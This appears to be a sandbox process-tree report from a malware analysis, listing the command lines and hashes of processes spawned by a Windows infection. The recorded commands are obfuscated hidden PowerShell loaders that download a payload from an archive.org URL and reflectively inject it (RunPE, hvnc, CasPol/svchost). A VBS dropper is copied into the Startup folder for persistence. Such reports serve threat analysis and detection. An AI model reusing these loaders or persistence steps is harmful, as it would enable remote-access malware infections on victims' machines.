"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5124 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 8400 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - cmd.exe (PID: 8740 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\pow\w m_startup. bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8820 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \pow\wm.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8912 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Users\P ublic\Docu ments\pow\ wm.vbs', ' C:\Users\' + [Enviro nment]::Us erName + ' '\AppData\ Roaming\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tup\ sbv.n avircse.vb s')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 8964 cmdline:
ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 8576 cmdline:
powershell -command [System.IO .File]::Co py('C:\Use rs\Public\ Documents\ pow\wm.vbs ', 'C:\Use rs\' + [En vironment] ::UserName + ''\AppD ata\Roamin g\Microsof t\Windows\ Start Menu \Programs\ Startup\ s bv.navircs e.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 704 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3912 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 8460 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 3548 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - cmd.exe (PID: 9000 cmdline:
"cmd" /C e cho %usern ame% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 9048 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\32\pu re_hnvc.ba t"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9056 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 9116 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \32\hnvc.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 9176 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 9184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8316 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4408 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\32\pu re_hnvc.ba t"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3800 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8552 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \32\hnvc.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6444 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8876 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 6852 cmdline:
cmd.exe /e :ON /v:OFF /d /c ""C :\Users\Pu blic\Docum ents\32\pu re_hnvc.ba t"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6044 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8796 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \32\hnvc.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 9136 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8744 cmdline:
"cmd" /C e cho %usern ame% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8740 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8608 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\Microso ft\Windows \Start Men u\Programs \Startup\s tart_sys.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8580 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6844 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \sys\hnvc. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 9076 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr 